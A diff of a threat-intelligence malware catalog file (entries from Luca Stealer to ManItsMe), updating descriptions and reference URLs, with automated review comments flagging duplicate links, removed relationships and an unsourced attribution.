+ "description": "According to PCRisk, The Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.\r\n\r\nThis malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.\r\n\r\nThis malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer",
@@ -30330,14 +32036,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
- "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
"https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
- "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
+ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html"
],
"synonyms": [
"LuminosityLink"
@@ -30348,13 +32054,21 @@
"value": "Luminosity RAT"
},
{
- "description": "Based on Mars Stealer.",
+ "description": "Lumma is an information stealer written in C, sold as a Malware-as-a-Service by LummaC on Russian-speaking underground forums and Telegram since at least August 2022. Lumma's capabilities are those of a classic stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",
- "https://twitter.com/fumik0_/status/1559474920152875008"
+ "https://twitter.com/sekoia_io/status/1572889505497223169",
+ "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/",
+ "https://twitter.com/Ishusoka/status/1614028229307928582",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx",
+ "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer",
+ "https://twitter.com/fumik0_/status/1559474920152875008",
+ "https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7"
+ ],
+ "synonyms": [
+ "LummaC2 Stealer"
],
- "synonyms": [],
"type": []
},
"uuid": "a14270e4-2b5e-4a90-9ccd-0b68690dbc3e",
@@ -30365,8 +32079,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney",
- "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
- "https://twitter.com/MrDanPerez/status/1097881406661902337"
+ "https://twitter.com/MrDanPerez/status/1097881406661902337",
+ "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html"
],
"synonyms": [],
"type": []
@@ -30384,15 +32098,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fcece2f7-e0ef-44e0-aa9f-578c2a56f532",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "929112e4-e252-4273-b3c2-fd414cfb2776",
"value": "Lurk"
},
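Review bot: as with the LoJax hunk above, deleting the `related` block (the `similar` link to `dest-uuid` `fcece2f7-e0ef-44e0-aa9f-578c2a56f532`) removes a cluster relationship from Lurk rather than refreshing its references; either keep the array or document in the commit message that these relationships are being retired deliberately.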
@@ -30453,9 +32158,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit",
- "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
"http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html",
- "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html"
+ "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
+ "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/"
],
"synonyms": [
"Adneukine",
@@ -30468,7 +32173,7 @@
"value": "Lyposit"
},
{
- "description": "",
+ "description": "According Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v",
@@ -30485,9 +32190,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py",
+ "https://youtu.be/3RYbkORtFnk",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py"
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html"
],
"synonyms": [],
"type": []
@@ -30501,8 +32208,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.macaw",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions"
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/"
],
"synonyms": [],
"type": []
@@ -30515,13 +32222,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.machete",
- "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6",
"https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
"https://securelist.com/el-machete/66108/",
+ "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/",
"https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf",
- "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/"
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
+ "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html"
],
"synonyms": [
"El Machete"
@@ -30556,11 +32263,28 @@
"uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
"value": "Magala"
},
+ {
+ "description": "According to DCSO, this malware is written as a Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie",
+ "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/",
+ "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01",
+ "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2e4a63ab-9a04-472f-aad0-3eb4835a4697",
+ "value": "Maggie"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
"https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
],
"synonyms": [],
@@ -30570,25 +32294,30 @@
"value": "MagicRAT"
},
{
- "description": "",
+ "description": "According to TXOne, The Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. However, it has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber",
- "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
- "https://www.youtube.com/watch?v=lqWJaaofNf4",
- "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
- "https://asec.ahnlab.com/en/19273/",
- "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
- "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
- "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
- "http://asec.ahnlab.com/1124",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware",
- "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
- "https://asec.ahnlab.com/en/30645/",
- "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/",
+ "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/",
+ "https://asec.ahnlab.com/en/41889/",
"https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/",
- "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/"
+ "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
+ "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/",
+ "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
+ "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
+ "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/",
+ "https://asec.ahnlab.com/en/19273/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
+ "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
+ "http://asec.ahnlab.com/1124",
+ "https://asec.ahnlab.com/en/30645/",
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
+ "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/"
],
"synonyms": [],
"type": []
@@ -30601,68 +32330,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
- "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
- "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf",
- "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
- "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
+ "https://lopqto.me/posts/automated-dynamic-import-resolving",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
+ "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
"https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://zero2auto.com/2020/05/19/netwalker-re/",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
- "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
- "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
- "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
- "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
- "https://www.youtube.com/watch?v=q8of74upT_g",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
- "https://www.ic3.gov/media/news/2020/200929-2.pdf",
- "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
- "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://lopqto.me/posts/automated-dynamic-import-resolving",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
"https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/",
+ "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
+ "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
+ "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
+ "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://zero2auto.com/2020/05/19/netwalker-re/",
+ "https://www.ic3.gov/media/news/2020/200929-2.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
"https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
- "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html"
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware"
],
"synonyms": [
"Koko Ransomware",
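Review bot: the Enel Group BleepingComputer article is still listed twice in this hunk, once without and once with a trailing slash (`.../netwalker-demands-14-million` at the line after the krebsonsecurity entry and `.../netwalker-demands-14-million/` a few lines further down); both forms were already present before the change, but since this hunk rewrites the whole `refs` array it is the natural place to keep only one. Beyond that, the hunk header (`-68 +68`) and a line-by-line comparison suggest this is a pure reordering with no URL added or removed, which makes the diff hard to review for the entries that did change elsewhere; if the source export does not emit a stable order, sorting the array (or preserving the existing order) in the generator would keep future diffs limited to real additions.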
@@ -30678,11 +32407,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o",
- "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/",
+ "https://blog.group-ib.com/task",
"https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
"https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf",
"https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
- "https://blog.group-ib.com/task"
+ "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/"
],
"synonyms": [],
"type": []
@@ -30695,8 +32424,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos",
- "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/",
+ "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos"
],
"synonyms": [],
"type": []
@@ -30709,10 +32438,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
- "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
+ "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html"
],
"synonyms": [],
"type": []
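Review bot: the two kindredsec entries (`https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/`, moved up in this hunk, and the unchanged `https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/` directly below it) point to the same article on two hostnames; since the hunk already touches that line, dropping one of them would avoid a duplicate reference.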
@@ -30734,13 +32463,14 @@
"value": "MakLoader"
},
{
- "description": "",
+ "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware",
"https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
"https://twitter.com/siri_urz/status/1221797493849018368",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/"
+ "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11"
],
"synonyms": [],
"type": []
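Review bot: the new `description` for the MAKOP entry attributes its content to BeforeCrypt, but no BeforeCrypt URL appears in the `refs` array of this hunk (only malpedia, lifars, microsoft, twitter and medium), so the claim cannot be traced from the cluster itself; add the source URL to `refs` or attribute the text to one of the listed references. The text is also pasted in the vendor's second-person register ("You may also notice that your desktop wallpaper has changed") and uses typographic quotes around “.makop”, while the other descriptions in this file are neutral third-person summaries with plain ASCII quotes; "There are no known free decryption tools" is additionally a time-bound statement that will go stale without a date. Suggest rewriting it along the lines of: `"description": "Ransomware first observed in 2020, described by BeforeCrypt as an offshoot of Phobos. Encrypted files typically receive the .makop extension and the desktop wallpaper is replaced; the malware uses RSA to protect its keys."`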
@@ -30753,9 +32483,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub",
- "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/",
+ "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
"https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/",
- "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html"
+ "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/"
],
"synonyms": [],
"type": []
@@ -30781,9 +32511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/",
"https://www.ic3.gov/Media/News/2021/210323.pdf",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
"https://securelist.com/the-return-of-mamba-ransomware/79403/"
],
"synonyms": [
@@ -30816,9 +32546,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf",
"https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf"
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg"
],
"synonyms": [
"junidor",
@@ -30853,15 +32583,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "25db921d-d753-4fb1-b51b-961d7fdae6f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
"value": "ManItsMe"
},
